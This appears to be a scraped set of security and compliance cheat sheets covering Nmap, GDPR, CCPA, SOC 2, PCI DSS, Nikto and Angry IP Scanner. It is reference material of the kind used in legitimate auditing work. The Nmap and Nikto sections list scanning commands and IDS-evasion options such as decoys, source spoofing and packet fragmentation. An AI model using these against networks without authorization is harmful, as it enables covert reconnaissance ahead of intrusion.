Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Nmap (Network Mapper) is a powerful, open-source tool for network discovery, security auditing, and vulnerability assessment. It is widely used by network administrators, penetration testers, and security professionals to map networks, discover hosts and services, and identify vulnerabilities.
Nmap is a command-line tool designed for network reconnaissance. It sends packets to target hosts and analyzes responses to determine which hosts are up, what services they offer, what operating systems they run, and more. Over its 25+ year history, Nmap has evolved from a simple port scanner to a comprehensive network security tool with advanced scripting capabilities .
Network Discovery & Inventory: Identify devices, services, and operating systems on a network.
Port Scanning: Detect open, closed, and filtered ports to assess potential entry points.
Vulnerability Scanning: Use scripts to find known vulnerabilities in services and configurations.
Security Auditing & Compliance: Ensure only authorized devices and services are present.
Penetration Testing: Simulate attacks to identify and fix vulnerabilities.
Firewall Testing: Evaluate firewall rules and responses to simulated attacks.
Network Security Monitoring: Detect changes in network topology or services .
TCP SYN (Stealth) Scan
Default, stealthy, half-open scan
nmap -sS <target>
TCP Connect Scan
Full TCP handshake, less stealthy
nmap -sT <target>
UDP Scan
Scans UDP ports
nmap -sU <target>
SCTP INIT Scan
For SCTP protocol (telecom networks)
nmap -sY <target>
TCP NULL/FIN/Xmas Scans
Stealth scans using unusual TCP flags
nmap -sN/-sF/-sX <target>
ACK Scan
Maps firewall rules, not port state
nmap -sA <target>
Idle Scan
Stealthy, uses a third-party host
nmap -sI <zombie> <target>
Version Detection
Detects service versions
nmap -sV <target>
OS Detection
Identifies target OS
nmap -O <target>
Ping Scan
Host discovery only, no port scan
nmap -sn <target>
List Scan
Lists targets, no packets sent
nmap -sL <target>
-sn
: Ping scan (host discovery only)
-Pn
: Treat all hosts as online (skip host discovery)
-PS/PA/PU/PR
: TCP SYN/ACK, UDP, ARP discovery on specified ports
-p <ports>
: Specify ports (e.g., -p 80,443
or -p 1-65535
)
-F
: Fast scan (fewer ports)
--top-ports <n>
: Scan top n most common ports
-sV
: Detect service versions
--version-intensity <0-9>
: Set version detection intensity
-O
: Enable OS detection
--osscan-limit
: Limit OS detection to hosts with open ports
--osscan-guess
: Aggressive OS guessing
-T0
to -T5
: Timing templates (T0=slowest/stealthiest, T5=fastest)
--min-rate/--max-rate
: Control packet sending rate
-oN <file>
: Normal output
-oX <file>
: XML output
-oG <file>
: Grepable output
-oA <basename>
: All formats at once
-f
: Fragment packets
-D <decoy1,decoy2,...>
: Use decoys
-S <IP>
: Spoof source address
-g <port>
: Use given source port
-sC
: Run default scripts
--script <name/category>
: Run specific scripts (e.g., --script=http-enum
)
--script-args <args>
: Pass arguments to scripts
NSE allows automation and advanced scanning using scripts written in Lua. Scripts are grouped by categories such as discovery, brute force, vulnerability, and exploitation.
Popular Scripts:
http-enum
: Enumerate web server directories/files
smb-os-discovery
: Identify OS via SMB
dns-brute
: Brute-force DNS subdomains
ftp-anon
: Check for anonymous FTP access
vulners
: Detect known vulnerabilities
snmp-brute
: Brute-force SNMP community strings
http-vuln-*
: Detect web application vulnerabilities
Usage Example:
nmap --script=http-enum <target>
nmap --script=vulners -p 80,443 <target>
Script Help:
nmap --script-help=<scriptname>
Script Arguments:
nmap --script=<script> --script-args=<args> <target>
Best Practices: Only run scripts you understand, especially those in intrusive
, exploit
, or vuln
categories, as they may disrupt services .
-T0
: Paranoid (very slow, stealthy)
-T1
: Sneaky
-T2
: Polite
-T3
: Normal (default)
-T4
: Aggressive (faster, less stealthy)
-T5
: Insane (fastest, most detectable)
Other Timing Controls:
--host-timeout <time>
: Max time per host
--scan-delay <time>
: Delay between probes
Normal: -oN <file>
XML: -oX <file>
Grepable: -oG <file>
All at once: -oA <basename>
Script Kiddie: -oS <file>
(fun, not practical)
Always obtain explicit permission before scanning any network you do not own or control. Unauthorized scanning is illegal and unethical .
Define clear objectives and scope for your scans.
Communicate with stakeholders to avoid disruptions.
Document and analyze scan results for future reference.
Be aware of network impact: Aggressive scans can disrupt services.
Understand legal and ethical constraints: Unauthorized use can result in legal action .
Use NSE scripts responsibly: Some scripts can be intrusive or disruptive .
Detection by IDS/IPS: Even stealth scans can be detected by modern security systems.
Network Impact: Large or aggressive scans may slow down or disrupt networks.
Legal Risks: Unauthorized scanning can lead to lawsuits or criminal charges.
Not a Vulnerability Scanner: Nmap can identify potential vulnerabilities, but is not a full vulnerability management solution .
# Basic host discovery (ping scan)
nmap -sn 192.168.1.0/24
# Stealth SYN scan of top 1000 ports
nmap -sS <target>
# Full TCP connect scan of all ports
nmap -sT -p 1-65535 <target>
# UDP scan of top 100 ports
nmap -sU --top-ports 100 <target>
# Service and version detection
nmap -sV <target>
# OS detection
nmap -O <target>
# Run default scripts
nmap -sC <target>
# Run specific NSE script
nmap --script=http-enum <target>
# Aggressive scan (OS, version, script, traceroute)
nmap -A <target>
# Output in all formats
nmap -oA scan_results <target>
-sS
TCP SYN (stealth) scan
-sT
TCP connect scan
-sU
UDP scan
-p
Specify ports
-F
Fast scan
-A
Aggressive scan (OS, version, scripts)
-O
OS detection
-sV
Service/version detection
-T0
--T5
Timing templates
-oN
/-oX
/-oG
/-oA
Output formats
-sC
Default scripts
--script
Specify NSE scripts
-D
Decoy scan
-f
Fragment packets
-Pn
Treat all hosts as online
Nmap is a versatile and indispensable tool for network security. Mastery of its options, scan types, and scripting capabilities can greatly enhance your ability to assess and secure networks. Always use Nmap responsibly, ethically, and legally.
The General Data Protection Regulation (GDPR) is the European Union’s landmark data privacy law, designed to protect the personal data and privacy of individuals within the EU and the European Economic Area (EEA). It also addresses the export of personal data outside the EU and EEA. Below is a comprehensive guide and cheat sheet covering the core aspects of GDPR compliance.
GDPR is built on seven core principles that must guide all personal data processing activities:
Lawfulness, Fairness, and Transparency: Data must be processed lawfully, fairly, and in a transparent manner .
Purpose Limitation: Data should be collected for specified, explicit, and legitimate purposes and not further processed in a way incompatible with those purposes .
Data Minimisation: Only collect data that is adequate, relevant, and necessary for the intended purpose .
Accuracy: Ensure personal data is accurate and kept up to date; rectify or erase inaccurate data promptly .
Storage Limitation: Do not keep data longer than necessary for the purposes for which it was collected .
Integrity and Confidentiality: Process data securely, protecting against unauthorized or unlawful processing, loss, destruction, or damage .
Accountability: Be able to demonstrate compliance with all GDPR principles .
Territorial Scope: Applies to all organizations processing personal data of individuals in the EU, regardless of the organization’s location. Also applies to organizations outside the EU if they offer goods/services to or monitor the behavior of EU residents .
Personal Data: Any information relating to an identified or identifiable natural person (data subject), e.g., names, emails, IP addresses .
Processing: Any operation performed on personal data (collection, storage, use, erasure, etc.).
Controller: Entity that determines the purposes and means of processing personal data .
Processor: Entity that processes data on behalf of the controller.
Consent: Freely given, specific, informed, and unambiguous indication of the data subject’s wishes .
GDPR grants individuals (data subjects) several rights regarding their personal data:
Right to be Informed: About data collection and use .
Right of Access: To their personal data and supplementary information .
Right to Rectification: To correct inaccurate or incomplete data .
Right to Erasure ("Right to be Forgotten"): To have data deleted under certain circumstances .
Right to Restrict Processing: To limit how data is used .
Right to Data Portability: To receive data in a structured, commonly used, machine-readable format .
Right to Object: To certain types of processing, such as direct marketing .
Rights Related to Automated Decision Making and Profiling: Not to be subject to decisions based solely on automated processing .
Right to Withdraw Consent: At any time, as easily as it was given .
Right to Complain: To a supervisory authority if rights are violated .
Must be freely given, specific, informed, and unambiguous .
Must be given by a clear affirmative action (no pre-ticked boxes or silence).
Must be as easy to withdraw as to give .
Organizations must be able to demonstrate that valid consent was obtained .
Data Protection by Design and by Default: Integrate data protection into processing activities and business practices from the outset .
Accountability: Maintain records of processing activities and implement appropriate technical and organizational measures .
Data Breach Notification: Notify the relevant supervisory authority within 72 hours of becoming aware of a breach, unless unlikely to result in risk to individuals .
Training and Awareness: Regularly train staff on data protection and GDPR compliance .
When Required: Must appoint a DPO if you are a public authority, engage in large-scale systematic monitoring, or process large-scale special categories of data .
Role: Advise on data protection, monitor compliance, serve as contact for data subjects and authorities, and conduct training .
Independence: Must operate independently and report to the highest management level .
Records of Processing Activities: Document purposes, categories of data, data subjects, recipients, and data transfers .
Data Protection Impact Assessments (DPIAs): Required for high-risk processing activities.
Policies and Procedures: Maintain up-to-date data protection policies, breach response plans, and retention schedules .
Technical and Organizational Measures: Implement appropriate security (e.g., encryption, pseudonymization, access controls) .
Regular Testing: Assess and evaluate the effectiveness of security measures regularly.
Data Protection by Design and Default: Integrate security into systems and processes from the start .
Supervisory Authority: Notify within 72 hours of becoming aware of a breach .
Data Subjects: Notify affected individuals if the breach is likely to result in a high risk to their rights and freedoms .
Documentation: Record all breaches, including facts, effects, and remedial actions .
Adequacy Decisions: Data can be transferred to countries deemed by the EU to provide adequate protection .
Appropriate Safeguards: Use Standard Contractual Clauses (SCCs), Binding Corporate Rules (BCRs), or other mechanisms if no adequacy decision exists .
Derogations: In specific cases, such as explicit consent, data can be transferred without adequacy or safeguards .
Transfer Impact Assessments: Assess the legal environment of the recipient country and implement additional safeguards if necessary .
Fines: Up to €20 million or 4% of annual global turnover, whichever is higher, for serious infringements.
Notable Fines:
Meta (Facebook): €1.2 billion for unlawful data transfers .
Amazon: €746 million for consent violations .
TikTok: €345 million for children’s data processing issues .
WhatsApp: €225 million for transparency failures .
Trends: Fines are increasing, especially for repeated or large-scale violations, and focus on international transfers, consent, and transparency .
GDPR applies globally to any organization processing EU residents’ data.
Data subject rights and consent are central to compliance.
Security, transparency, and accountability are non-negotiable.
Non-compliance can result in severe financial and reputational consequences.
Regular training, documentation, and audits are essential for ongoing compliance.
This guide provides a comprehensive overview and actionable cheat sheet for GDPR compliance. For detailed implementation, always consult the full text of the GDPR and seek legal advice where necessary.
Awareness & Training
Train staff, raise awareness, appoint DPO if required
Data Inventory & Mapping
Document what data you collect, where it goes, and why
Consent Management
Review and update consent mechanisms, keep records
Data Subject Rights
Set up processes to handle access, rectification, erasure, and other rights
Security Measures
Implement encryption, access controls, regular security reviews
Data Breach Response
Establish breach detection, notification, and documentation procedures
International Transfers
Assess adequacy, use SCCs/BCRs, conduct transfer impact assessments
Documentation
Maintain records of processing, DPIAs, policies, and procedures
Regular Audits
Conduct periodic reviews and audits of data protection practices
The California Consumer Privacy Act (CCPA) is a landmark data privacy law that grants California residents significant rights over their personal information and imposes strict obligations on businesses. This guide provides a thorough summary and practical cheat sheet for understanding, complying with, and implementing the CCPA, including recent amendments and best practices.
Enacted in 2018, effective January 1, 2020, the CCPA enhances privacy rights and consumer protection for California residents .
Amended by the California Privacy Rights Act (CPRA), effective January 1, 2023, which expanded consumer rights and established the California Privacy Protection Agency (CPPA) .
The CCPA applies to for-profit businesses that do business in California and meet any of the following thresholds:
Gross Annual Revenue: Over $26.625 million (as of January 1, 2025; previously $25 million) .
Data Transactions: Buy, sell, or share the personal information of 100,000 or more California residents, households, or devices annually .
Revenue from Data: Derive 50% or more of annual revenue from selling or sharing personal information .
Note: The law applies to businesses outside California if they meet these thresholds and handle California residents’ data .
Consumer: A natural person who is a California resident .
Business: A for-profit entity that collects consumers’ personal information, determines the purposes and means of processing, and meets the applicability thresholds .
Personal Information: Information that identifies, relates to, describes, or could reasonably be linked with a particular consumer or household.
Sensitive Personal Information: Includes government IDs, financial data, geolocation, racial/ethnic origin, health data, and, as of August 2024, neural data .
Right to Know/Access
Know what personal info is collected, sources, purposes, and third parties shared with
Provide this info upon request within 45 days; update privacy policy accordingly
Right to Delete
Request deletion of personal info held by the business
Delete info and instruct service providers to do the same, unless an exception applies
Right to Opt-Out
Opt out of the sale of personal info
Provide a “Do Not Sell My Personal Information” link; honor opt-out requests for at least 12 months
Right to Correct
Request correction of inaccurate personal info (added by CPRA)
Correct inaccurate info upon request
Right to Limit
Limit use/disclosure of sensitive personal info
Provide a “Limit the Use of My Sensitive Personal Information” link
Right to Non-Discrimination
No discrimination for exercising CCPA rights
Cannot deny goods/services, charge different prices, or provide different quality of service
Transparency: Provide clear, conspicuous notices about data collection, use, and sharing .
Privacy Policy: Update at least every 12 months; must detail consumer rights and how to exercise them .
Opt-Out Mechanism: Prominently display “Do Not Sell My Personal Information” and “Limit the Use of My Sensitive Personal Information” links .
Consumer Request Handling: Offer at least two methods for submitting requests (e.g., toll-free number, web form) .
Verification: Verify consumer identity before fulfilling requests .
Timely Response: Respond to requests within 45 days (with a possible 45-day extension) .
Data Security: Implement reasonable security measures (encryption, access controls, regular audits) .
Employee Training: Train staff on CCPA requirements and consumer request handling .
Third-Party Management: Update contracts to ensure vendors comply with CCPA .
Record Keeping: Maintain records of consumer requests and responses for at least 24 months .
Conduct a Data Inventory: Map all personal data collected, processed, and shared .
Update Privacy Policies and Notices: Ensure clarity and compliance with CCPA requirements .
Implement Consumer Rights Protocols: Streamline processes for handling access, deletion, correction, and opt-out requests .
Provide Opt-Out and Limitation Links: Make these links easy to find and use; recognize global opt-out signals .
Enhance Data Security: Use encryption, access controls, and regular security assessments.
Audit Third-Party Agreements: Ensure all vendors and partners are CCPA-compliant .
Regularly Review Compliance: Stay updated on amendments and adjust practices as needed.
CPRA Amendments: Effective January 1, 2023, expanded consumer rights and established the CPPA .
2024 Amendments: Six new amendments passed, including expanded definitions (e.g., neural data as sensitive personal info) and additional protections for reproductive healthcare and citizenship data .
2025 Updates: New regulations on automated decision-making, cybersecurity audits, and risk assessments; increased penalties and new obligations for businesses .
Delayed Enforcement: CPPA won an appeal in February 2024, delaying enforcement of updated regulations by one year .
Regulatory Bodies: California Attorney General and California Privacy Protection Agency (CPPA) .
Cure Period: 30-day period to fix violations after notification (may not apply to all violations post-CPRA) .
Private Right of Action: Consumers can sue for certain data breaches .
Penalties:
Up to $2,500 per unintentional violation
Up to $7,500 per intentional violation
No cap on total fines; penalties can accumulate
Additional Costs: Injunctions, reputational damage, and civil lawsuit costs.
Sephora (2022): $1.2 million fine for failing to disclose data sales and not honoring global opt-out signals .
Todd Snyder, Inc.: $345,178 fine for improper opt-out mechanisms and excessive data collection.
Honda (2025): $632,500 fine for difficult opt-out process and excessive info requests .
DoorDash (2024): $375,000 fine for sharing user data with marketing partners without proper notice .
Who Must Comply?
For-profit businesses in CA or serving CA residents, meeting revenue/data thresholds
Consumer Rights
Know, Delete, Opt-Out, Correct, Limit, Non-Discrimination
Privacy Policy
Must be clear, updated annually, and detail rights/processes
Opt-Out Links
“Do Not Sell My Personal Information” and “Limit the Use of My Sensitive Personal Information”
Request Handling
At least two methods; respond in 45 days; verify identity
Data Security
Reasonable measures (encryption, access controls, audits)
Employee Training
Required for all staff handling consumer data
Third-Party Contracts
Must ensure CCPA compliance
Penalties
$2,500–$7,500 per violation; no cap; private right of action for breaches
Recent Changes
CPRA amendments, new sensitive data categories, increased penalties, new regulations (2023–2025)
Stay Informed: Regularly monitor updates from the California Privacy Protection Agency and Attorney General.
Review Practices: Conduct annual reviews of privacy policies, data inventories, and compliance protocols.
Document Everything: Keep detailed records of compliance efforts, consumer requests, and responses.
Right to Correct
No
Yes
Right to Limit Sensitive Info
No
Yes
Sensitive Info Definition
Basic
Expanded (e.g., neural data, health, etc.)
Enforcement Agency
Attorney General
CPPA (new agency)
Automated Decision-Making
Not addressed
New regulations in 2025
Risk Assessments
Not required
Required for certain businesses
SOC 2 Type II is an independent attestation report that evaluates how effectively an organization’s controls related to information security, availability, processing integrity, confidentiality, and privacy operate over a defined period (typically 6–12 months). It is based on the American Institute of Certified Public Accountants (AICPA) Trust Services Criteria (TSC) and is especially relevant for service organizations that handle sensitive or customer data .
Purpose: To provide assurance to clients and stakeholders that an organization has robust, effective controls in place to protect data and systems over time.
Importance:
Demonstrates a commitment to security and compliance.
Enhances trust and credibility with customers and partners.
Helps meet regulatory requirements (e.g., GDPR, HIPAA, PCI DSS).
Provides a competitive advantage in industries where data protection is critical .
Scope
Design of controls
Design & operational effectiveness
Testing Period
Single point in time
Over a period (3–12 months)
Assurance Level
Limited (design only)
High (design + operation)
Use Case
Quick demonstration of controls
Ongoing, sustained compliance
Report Content
Auditor’s opinion on design
Auditor’s opinion + effectiveness
Cost/Time
Lower/Shorter
Higher/Longer
Security (Common Criteria)
Protection against unauthorized access, disclosure, and damage.
Controls: Firewalls, access controls, encryption, monitoring .
Availability
Systems are operational and accessible as needed.
Controls: Performance monitoring, disaster recovery, incident response .
Processing Integrity
System processing is complete, valid, accurate, timely, and authorized.
Controls: Data validation, error detection, monitoring .
Confidentiality
Information designated as confidential is protected.
Controls: Encryption, access restrictions, secure transmission .
Privacy
Personal information is collected, used, retained, disclosed, and disposed of in accordance with privacy policies and regulations.
Controls: Consent management, data protection, user access .
Define Scope
Identify systems, processes, and data to be audited.
Select relevant TSCs .
Risk Assessment
Identify vulnerabilities and threats.
Develop mitigation strategies .
Establish Controls
Implement policies, procedures, and technical controls.
Ensure controls align with selected TSCs .
Readiness Assessment
Conduct a mock audit to identify gaps.
Address deficiencies before the official audit .
Select Auditor
Choose a qualified CPA firm experienced in SOC 2 audits.
Audit Period
Controls are tested for operational effectiveness over 3–12 months .
Evidence Collection
Provide documentation: policies, logs, incident reports, training records, etc. .
Reporting
Auditor issues a detailed report with findings and recommendations.
Process Flows: Diagrams and descriptions of workflows.
Policies & Procedures: Security, privacy, incident response, data handling.
Evidence of Controls: Access logs, audit trails, encryption protocols, monitoring reports.
Training Records: Proof of employee training on security and compliance .
Navigating complex and evolving regulations.
Ensuring third-party/vendor compliance.
Maintaining up-to-date documentation.
Training and awareness for all staff.
Continuous monitoring and improvement of controls .
Risk-Based Approach: Regularly assess and prioritize risks .
Strong Internal Controls: Segregation of duties, automated workflows, continuous monitoring.
Continuous Monitoring: Regular internal audits and compliance checks.
Employee Training: Ongoing, role-specific training programs .
Leverage Technology: Use compliance management tools for automation and tracking .
Stakeholder Engagement: Involve all levels of the organization in compliance efforts.
Readiness Assessments: Conduct mock audits to identify and address gaps before the official audit .
Center for Internet Security (CIS): Completed a SOC 2 Type II audit to protect member data and meet compliance requirements .
ManagingLife: Embedded security and privacy into their business model to achieve SOC 2 compliance .
Shutlingsloe Ltd: Underwent a readiness assessment to prepare for SOC 2 Type II, highlighting the importance of preparation and gap analysis .
Purpose
Prove controls are effective over time; build trust
Scope
Security, Availability, Processing Integrity, Confidentiality, Privacy
Audit Period
3–12 months (controls tested over time)
Documentation
Policies, procedures, logs, evidence of controls, training records
Best Practices
Risk assessment, readiness assessment, continuous monitoring, training
Challenges
Regulatory complexity, third-party risk, documentation, training
Type I vs. Type II
Type I: Design at a point in time; Type II: Design + operation over time
Outcome
Detailed report for clients/stakeholders; recommendations for improvement
SOC 2 Type II is a rigorous, time-bound audit that demonstrates an organization’s ability to maintain effective controls for information security and privacy. It is essential for organizations handling sensitive data, providing a high level of assurance to clients and partners, and is a key differentiator in competitive markets. Preparation, documentation, and continuous improvement are critical to successful compliance .
Use this summary and cheat sheet as a foundation for understanding, preparing for, and maintaining SOC 2 Type II compliance.
The Payment Card Industry Data Security Standard (PCI DSS) is a globally recognized set of security standards designed to ensure that all organizations that accept, process, store, or transmit credit card information maintain a secure environment. It was first launched in 2006 and is maintained by the PCI Security Standards Council (PCI SSC) .
Initial Release: 2006
Current Version: PCI DSS v4.0 (released March 31, 2022)
Key Milestones:
PCI DSS v3.2.1 retired on March 31, 2024
PCI DSS v4.0 is now the only active version
Some new requirements in v4.0 become mandatory on March 31, 2025
Key Drivers for v4.0:
Adapting to new technologies (cloud, contactless payments)
Addressing evolving cyber threats
Incorporating industry feedback (over 6,000 pieces of input from 200+ organizations)
Major Changes in v4.0:
Introduction of a "customized approach" for meeting requirements
Stricter multi-factor authentication and password policies
New requirements for phishing and e-skimming
Enhanced reporting and validation methods
Install and maintain a firewall configuration to protect cardholder data
Do not use vendor-supplied defaults for system passwords and other security parameters
Protect stored cardholder data
Encrypt transmission of cardholder data across open, public networks
Protect all systems against malware and regularly update anti-virus software or programs
Develop and maintain secure systems and applications
Restrict access to cardholder data by business need to know
Identify and authenticate access to system components
Restrict physical access to cardholder data
Track and monitor all access to network resources and cardholder data
Regularly test security systems and processes
Maintain a policy that addresses information security for all personnel
Each requirement contains detailed sub-requirements specifying the exact controls and measures needed for compliance.
PCI DSS compliance is divided into four levels based on the volume of card transactions processed annually:
Level 1: >6 million transactions/year
Level 2: 1–6 million transactions/year
Level 3: 20,000–1 million transactions/year
Level 4: <20,000 transactions/year
All levels must meet the 12 core requirements, but the assessment and validation process varies by level .
Assessment Procedures:
Self-Assessment Questionnaire (SAQ): For smaller merchants or those with lower risk profiles
Report on Compliance (ROC): For larger merchants or those required to have an on-site assessment by a Qualified Security Assessor (QSA)
Vulnerability Scanning & Penetration Testing: Required regularly (at least quarterly for scans)
Annual or Quarterly Reporting: Depending on card brand and merchant level
Use Implementation Frameworks: Organize and structure compliance efforts using established frameworks .
Integrate Compliance into Business Processes: Embed PCI DSS requirements into contracts and daily operations.
Engage Stakeholders: Involve all relevant parties, including IT, management, and third-party vendors.
Iterative Feedback: Continuously monitor, test, and adapt security controls.
Resource Management: Prioritize strategies based on available resources and risk .
Common Challenges:
Complexity and non-linearity of requirements
Resource constraints (time, personnel, budget)
Maintaining stakeholder engagement
Ensuring clear specification and documentation of controls .
PCI Security Standards Council Document Library: Official standards, templates, and guidance .
PCI DSS v4.x Resource Hub: Latest documents and educational materials .
Compliance Toolkits: Pre-packaged resources to streamline compliance (e.g., PCI-DSS-Compliance-Toolkit) .
Cloud Provider Support: AWS and Azure offer PCI DSS compliance tools and documentation .
Qualified Security Assessors (QSAs): Certified professionals who can guide and validate compliance .
Retail Chains: Use enterprise-class log management to pass audits .
Fintechs (e.g., TransferGo): Achieved Level 1 compliance with reduced manpower using specialized tools .
Online Retailers: Overcame audit failures and achieved compliance through targeted remediation .
Service Providers: Implemented secure payment experiences and achieved compliance through tailored solutions .
March 31, 2022
PCI DSS v4.0 released
March 31, 2024
PCI DSS v3.2.1 retired; v4.0 is only active
March 31, 2025
Future-dated v4.0 requirements become mandatory
Scope
Applies to all entities storing, processing, or transmitting cardholder data
12 Requirements
Firewall, no default passwords, protect data, encrypt, anti-malware, secure apps, restrict access, authenticate, physical security, logging, testing, security policy
Compliance Levels
1: >6M, 2: 1–6M, 3: 20K–1M, 4: <20K transactions/year
Assessment
SAQ (self), ROC (QSA), vulnerability scans, pen tests
Validation
Annual/quarterly reporting, varies by level and card brand
v4.0 Highlights
Customized approach, stricter MFA, new phishing/e-skimming controls
Best Practices
Integrate into processes, engage stakeholders, continuous improvement
Common Challenges
Complexity, resource constraints, stakeholder engagement
Resources
PCI SSC library, toolkits, cloud provider docs, QSAs
Transition Dates
v4.0 only after March 31, 2024; new reqs mandatory March 31, 2025
Continuous Compliance: PCI DSS is not a one-time project but an ongoing process of maintaining and improving security controls.
Documentation: Keep thorough records of all compliance activities, assessments, and remediation efforts.
Stay Updated: Regularly review PCI SSC updates and adapt to new requirements as they are published.
By following these guidelines and leveraging available resources, organizations can effectively achieve and maintain PCI DSS compliance, thereby protecting cardholder data and reducing the risk of data breaches .
Alex Joseph
Nikto is a widely used open-source web server scanner designed to identify vulnerabilities, misconfigurations, and security issues in web servers and web applications. This guide provides a thorough overview, including installation, usage, command-line options, best practices, troubleshooting, and more.
Nikto is a Perl-based tool that scans web servers for:
Over 6,700 potentially dangerous files/programs
Outdated versions of 1,250+ servers
Version-specific problems on 270+ servers
Server configuration issues (e.g., multiple index files, HTTP options)
SSL, proxy, and host authentication support
Customizable scans and plugin support
Integration with other security tools and extensive reporting/logging .
Technical Specs:
Runs on any platform with Perl (Linux, Windows, macOS)
Command-line interface
Built on LibWhisker2 .
Perl (pre-installed on most Linux/macOS; install via Strawberry Perl on Windows)
Git (optional, for cloning the repository)
Linux/macOS
git clone https://github.com/sullo/nikto.git
cd nikto/program
perl nikto.pl -H
Windows
Install Strawberry Perl
Download or clone Nikto as above
Run via Command Prompt:
perl nikto.pl -H
Note: Always update Nikto after installation:
perl nikto.pl -update
-h <host>
Target host (IP, hostname, or URL)
-h example.com
-p <port>
Target port (default: 80)
-p 8080
-o <file>
Output file
-o results.txt
-Format <format>
Output format: txt, csv, html, xml
-Format html
-T <timeout>
Timeout for requests (seconds)
-T 10
-ssl
Force SSL (HTTPS)
-ssl
-Cgidirs <dirs>
CGI directories to scan (comma-separated)
-Cgidirs /cgi-bin/
-Plugins <plugin>
Specify plugins to use
-Plugins apache_expect_xss
-evasion <tech>
Use evasion techniques (anti-IDS)
-evasion 1
-Tuning <options>
Select test types (see below)
-Tuning 123
-useragent <string>
Set custom User-Agent
-useragent "Mozilla/5.0"
-useproxy
Use proxy (set in config)
-useproxy
-config <file>
Use alternate config file
-config /path/to/nikto.conf
-update
Update plugins and databases
-update
-list-plugins
List available plugins
-list-plugins
-Display <opts>
Control output verbosity (V, D, E, S, I, L, M, A)
-Display V
-Help
or -H
Show help
-H
Tuning Options (for -Tuning
):
0: File Upload
1: Interesting File / Seen in logs
2: Misconfiguration / Default File
3: Information Disclosure
4: Injection (XSS, SQLi, etc.)
5: Remote File Retrieval
6: Denial of Service
7: Remote File Execution
8: Command Execution
Standard Scan: Default, comprehensive scan for known vulnerabilities.
Tuning: Use -Tuning
to focus on specific vulnerability types.
Evasion: Use -evasion
to attempt bypassing IDS/IPS (not stealthy by default).
Custom Plugins: Use -Plugins
to load specific vulnerability checks.
nikto.conf
)Set default options, proxy, user-agent, etc.
Example entries:
PROXYHOST=127.0.0.1
PROXYPORT=8080
USERAGENT=Mozilla/5.0
Vulnerability Assessment: Identify known vulnerabilities and misconfigurations on web servers.
Security Audits: Regularly scan servers for compliance and security posture.
Penetration Testing: Use as part of a broader toolkit to simulate attacks.
CI/CD Integration: Automate scans in development pipelines to catch issues early .
Update Regularly: Keep Nikto and its databases up-to-date for latest vulnerability checks.
Combine Tools: Use Nikto alongside other scanners (e.g., Nmap, Burp Suite) for comprehensive coverage.
Customize Scans: Tailor scans using tuning, plugins, and configuration to reduce noise and false positives.
Permission: Always have explicit authorization before scanning any system.
Schedule Scans: Run during off-peak hours to minimize impact on production systems.
Review Results: Manually verify findings to filter out false positives .
Not Stealthy: Nikto is easily detected by IDS/IPS and will appear in server logs.
False Positives: May report issues that are not exploitable; manual review is necessary.
Limited to Known Vulnerabilities: Does not detect zero-days or complex logic flaws.
Potential Impact: Scans can be resource-intensive; avoid on sensitive/production systems without planning .
Perl Errors: Ensure Perl is installed and up-to-date.
Network Issues: Check connectivity and firewall settings.
False Positives: Cross-reference with other tools and manual inspection.
Update Failures: Run as administrator/root if permissions are an issue.
Enterprise: Regularly scheduled scans as part of vulnerability management.
Education: Used in cybersecurity courses for hands-on web security training.
Open Source Projects: Pre-release scans to ensure web app security .
# Basic scan
perl nikto.pl -h http://example.com
# Scan with custom port and output to HTML
perl nikto.pl -h example.com -p 8080 -o scan.html -Format html
# Use SSL and specific tuning options
perl nikto.pl -h example.com -ssl -Tuning 123
# Use a proxy
perl nikto.pl -h example.com -useproxy
# List available plugins
perl nikto.pl -list-plugins
# Update Nikto
perl nikto.pl -update
Basic Scan
perl nikto.pl -h example.com
Scan HTTPS
perl nikto.pl -h example.com -ssl
Specify Port
perl nikto.pl -h example.com -p 8443
Output to File (HTML)
perl nikto.pl -h example.com -o out.html -Format html
Use Proxy
perl nikto.pl -h example.com -useproxy
Update Nikto
perl nikto.pl -update
List Plugins
perl nikto.pl -list-plugins
Custom User-Agent
perl nikto.pl -h example.com -useragent "TestAgent"
Tuning (e.g., XSS, Info)
perl nikto.pl -h example.com -Tuning 34
Official Documentation & Tutorials: Always refer to the official documentation for the latest features and usage.
Community Forums: Engage with the community for troubleshooting and advanced use cases.
Security Blogs & YouTube: Find step-by-step guides and real-world demonstrations.
By following this guide and cheat sheet, you can effectively install, configure, and use Nikto for web server vulnerability scanning, while understanding its strengths, limitations, and best practices for secure and responsible use .
Angry IP Scanner is a fast, open-source, cross-platform network scanner popular among IT professionals, network administrators, and security enthusiasts. This guide provides a detailed overview, installation instructions, feature breakdown, usage tips, and a handy cheat sheet for quick reference.
Angry IP Scanner is designed to scan IP addresses and ports, helping users discover devices and services on a network. Its key strengths are speed, simplicity, and extensibility through plugins. It is available for Windows, macOS, and Linux, and does not require installation on most platforms, making it highly portable .
Download: Visit the official Angry IP Scanner website and download the appropriate version for your operating system.
No Installation Required: On most platforms, Angry IP Scanner is a standalone executable (portable). Simply extract and run.
Java Requirement: Angry IP Scanner requires Java Runtime Environment (JRE). Ensure Java is installed on your system.
Windows: Download the .exe
file. Double-click to run. For advanced use, add the executable to your PATH for command-line access.
macOS: Download the .dmg
or .jar
file. For .dmg
, drag to Applications. For .jar
, run with java -jar
.
Linux: Download the .deb
, .rpm
, or .jar
file. Install using your package manager or run the .jar
directly.
Tip: Always use the latest version for new features and security patches .
IP Range Fields: Enter the starting and ending IP addresses for your scan.
Ports Field: Specify which ports to scan (e.g., 80, 443, 1-1024).
Start/Stop Buttons: Begin or halt a scan.
Results Table: Displays discovered hosts, open ports, hostnames, MAC addresses, and more.
Menu Bar: Access preferences, plugins, export options, and help.
Preferences: Set default IP ranges, ports, thread count, and appearance (dark/light mode).
Data Fetchers: Choose which information to collect (e.g., hostname, MAC address, NetBIOS info).
Plugins: Manage and install plugins to extend functionality .
IP Range: Scan a single IP, a range (e.g., 192.168.1.1-254), or a list from a file.
Port Range: Scan specific ports (e.g., 22, 80, 443) or a range (e.g., 1-1024).
Ping Method: Choose between ICMP, TCP, or UDP ping to detect live hosts.
Threads: Adjust the number of concurrent threads for faster scanning (default: 100).
Multithreaded Scanning: Scans multiple IPs/ports in parallel for speed .
Custom Data Fetchers: Add or remove columns to collect specific data.
Plugin Support: Extend with community or custom plugins.
